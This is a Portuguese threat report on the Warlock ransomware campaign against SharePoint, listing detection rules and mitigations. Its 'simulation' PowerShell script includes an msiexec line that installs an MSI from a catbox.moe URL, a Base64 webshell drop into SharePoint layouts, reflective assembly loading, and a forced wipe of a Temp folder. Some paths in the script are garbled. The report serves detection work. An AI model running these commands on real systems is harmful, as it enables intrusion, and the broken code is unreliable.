Warlock Ransomware Ataca Infraestrutura Crítica de Água e Telecomunicações
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um ator de ameaça com ligação à China, rastreado como Longlegs, está implantando o ransomware Warlock explorando vulnerabilidades do Microsoft SharePoint. O grupo usa uma cadeia de exploração ToolShell para acesso inicial antes de se mover lateralmente por redes comprometidas. Os atacantes também aplicam técnicas avançadas de evasão, incluindo o abuso de drivers vulneráveis para desativar software de segurança e aproveitam serviços de nuvem legítimos para entrega de carga útil.
Investigação
A investigação rastreou atividades desde a exploração inicial do SharePoint até a implantação de um webshell no diretório LAYOUTS. Analistas observaram chaves de máquina ASP.NET falsificadas sendo usadas para execução remota de código e ransomware preparado no compartilhamento SYSVOL para distribuição em todo o domínio. A cadeia de ataque também envolveu carregamento de DLLs e abuso da funcionalidade de tunelamento do Visual Studio Code para acesso persistente.
Mitigação
As organizações devem priorizar a aplicação de patches no Microsoft SharePoint Server para remediar vulnerabilidades conhecidas do ToolShell. A aplicação de controles rigorosos sobre drivers assinados, mas vulneráveis, pode ajudar a prevenir ataques BYOVD. As equipes de segurança também devem monitorar o uso anômalo de ferramentas de ‘living-off-the-land’ e restringir o acesso ao compartilhamento SYSVOL para atividades não administrativas para reduzir a movimentação lateral e a implantação de ransomware.
Resposta
Quando atividades maliciosas são detectadas, os respondedores a incidentes devem isolar os servidores SharePoint afetados e inspecionar o compartilhamento SYSVOL em busca de scripts ou binários não autorizados. Realize uma auditoria abrangente das contas de domínio, com foco em adições não autorizadas ao grupo local de Administradores. Reveja o tráfego de rede para conexões de saída para serviços de compartilhamento de arquivos, como catbox.moe ou wasabisys.com usados para preparação de carga útil.
Fluxo de Ataque
Detecções
Adicionar Usuário aos Administradores Locais (via cmdline)
Download ou Upload via Powershell (via cmdline)
Strings Powershell Suspeitas (via cmdline)
Chamar Classes/Métodos .NET Suspeitos a partir do CommandLine do Powershell (via process_creation)
Possível Descoberta de Compartilhamentos de Rede (via cmdline)
Descoberta de Confianças de Domínio Suspeitas (via cmdline)
Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)
Execução Suspeita a partir do Perfil de Usuário Público (via process_creation)
Strings Powershell Suspeitas (via powershell)
Chamar Métodos .NET Suspeitos a partir do Powershell (via powershell)
Possível Criação de Webshell em Diretórios do Microsoft Exchange/Sharepoint (via file_event)
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
Comando e Controle Suspeito por Solicitação para Domínio de Interações Fora-de-Banda (via dns)
IOCs (HashSha256) para detectar: Ransomware Warlock Ataca Operadoras de Água e Telecomunicações
Detecção de Comando Malicioso do PowerShell para Execução de Código [Windows Powershell]
Preparação e Execução de Ransomware Warlock via Compartilhamentos de Rede [Windows File Event]
Indicadores de Ransomware Warlock em Servidores SharePoint [Windows Process Creation]
Execução de Simulação
Pré-requisito: A Verificação de Telemetria e Linha de Base Pre-flight deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque e Comandos: O adversário visa implantar o ransomware Warlock em um servidor SharePoint. O ataque começa com o uso de
msiexecpara obter um MSI malicioso de um domínio remoto controlado por atacantes (catbox.moe). Após o acesso inicial, o atacante usa o PowerShell para gravar um web shell ASPX malicioso no SharePointlayout2sp.aspxusando uma carga útil codificada em Base64 para contornar filtros simples de string. Finalmente, o atacante tenta carregar um assembly .NET malicioso diretamente na memória usandoSystem.Workflow.ComponentModelpara executar código sem deixar vestígios no disco. -
Script de Teste de Regressão:
# Script de Simulação de Ransomware Warlock # NOTA: Este script é apenas para fins de teste autorizados. Write-Host "[!] Iniciando Simulação de Ransomware Warlock..." -ForegroundColor Red # 1. Simular Download Remoto do MSIEXEC (Seleção 3) Write-Host "[*] Simulando download de carga útil remota do MSIEXEC..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simular Queda do Web Shell ASPX pelo PowerShell (Seleção 1) # Usamos a string exata da regra para garantir a detecção Write-Host "[*] Simulando queda do web shell pelo PowerShell via Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simular Carregamento de Assembly Refletivo (Seleção 2) Write-Host "[*] Simulando Carregamento de Assembly Refletivo..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Comandos de simulação enviados." -ForegroundColor Green -
Comandos de Limpeza:
# Script de limpeza para remover qualquer artefato criado durante a simulação Write-Host "[!] Limpando artefatos da simulação..." -ForegroundColor Yellow # Remover arquivos simulados (Nota: Em um teste real, você miraria nos caminhos específicos criados) # Como usamos strings fictícias, principalmente garantimos que nenhum arquivo malicioso verdadeiro foi solto. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Limpeza concluída." -ForegroundColor Green